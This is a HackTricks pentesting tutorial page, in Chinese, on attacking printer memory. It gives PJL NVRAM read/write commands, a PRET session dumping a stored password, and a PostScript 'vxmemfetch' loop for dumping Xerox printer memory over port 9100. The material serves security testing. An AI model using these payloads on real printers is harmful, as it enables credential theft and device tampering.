hacktricks/network-services-pentesting/pentesting-printers/memory-access.md

3.7 KiB
Raw Blame History

零基础学习 AWS 黑客技术成为英雄 htARTE (HackTricks AWS 红队专家)

支持 HackTricks 的其他方式:

您可以尝试转储 NVRAM 并从中提取机密信息(如密码)。

PJL (Brother) 中,您可以使用 PJL 访问任意 NVRAM 地址,如下所示:

@PJL RNVRAM ADDRESS = X              # read byte at location X
@PJL WNVRAM ADDRESS = X DATA = Y     # write byte Y to location X

您可以使用 PRET 来测试这种攻击:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> nvram dump
Writing copy to nvram/printer
................................................................................
................................................................................
............................................MyS3cretPassw0rd....................
................................................................................

某些Xerox打印机型号内置了专有的PostScript vxmemfetch操作符允许攻击者读取任意内存地址。通过使用PostScript循环如下所示可以轻松地用这个功能来转储整个内存PRET没有这个攻击所以你需要将这个有效载荷通过nc连接发送到9100端口

/counter 0 def 50000 {
/counter counter 1 add def
currentdict /RRCustomProcs /ProcSet findresource begin
begin counter 1 false vxmemfetch end end == counter
} repeat

更多信息请访问: http://hacking-printers.net/wiki/index.php/Memory_access

通过 htARTE (HackTricks AWS Red Team Expert)从零开始学习AWS黑客攻击

支持HackTricks的其他方式